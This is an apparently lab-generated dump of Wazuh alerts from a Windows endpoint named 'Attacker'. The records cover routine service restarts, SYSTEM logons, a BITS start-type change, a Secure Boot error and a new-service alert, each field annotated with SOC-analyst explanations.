rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533887.115645 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:47:48.6215646Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2373 Incremental log record number – handy for timeline order.
data.win.system.processID: 2116 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-21T01:40:48Z. Reason: RulesEngine." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: 2025-04-21T01:40:48Z, RulesEngine No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533887.117224 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:53:34.5100079Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2377 Incremental log record number – handy for timeline order.
data.win.system.processID: 3028 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-21T01:40:34Z. Reason: RulesEngine." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: 2025-04-21T01:40:34Z, RulesEngine No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533888.118803 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:41:55.1493380Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43476 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 10144 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Service startup type was changed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61104 Numeric ID of the detection rule that fired.
rule.info: This does not appear to be logged on Windows 2000 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'policy_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533888.126141 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 7040 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:39.2603970Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2907 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 5692 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param1: Background Intelligent Transfer Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param2: demand start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param3: auto start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param4: BITS No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533889.127951 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:42:50.7769481Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43478 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 10144 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533889.135289 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:42:59.1075434Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43480 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 10144 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Windows System error event Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61102 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy, but it can warn you of high-value detections.
rule.groups: ['windows', 'windows_system', 'system_error'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gpg13: ['4.3'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533890.142627 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-TPM-WMI No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {7d5387b0-cbe0-11da-a94d-0800200c9a66} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1796 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:55.0846511Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2913 Incremental log record number – handy for timeline order.
data.win.system.processID: 14920 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 3420 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: ERROR TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The Secure Boot update failed to update a Secure Boot variable with error Secure Boot is not enabled on this machine.. For more information, please see https://go.microsoft.com/fwlink/?linkid=2169931" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hResult: -2147020471 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: New Windows Service Created Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61138 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1543.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Persistence', 'Privilege Escalation'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Service'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy, but it can warn you of high-value detections.
rule.groups: ['windows', 'windows_system'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533891.144212 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
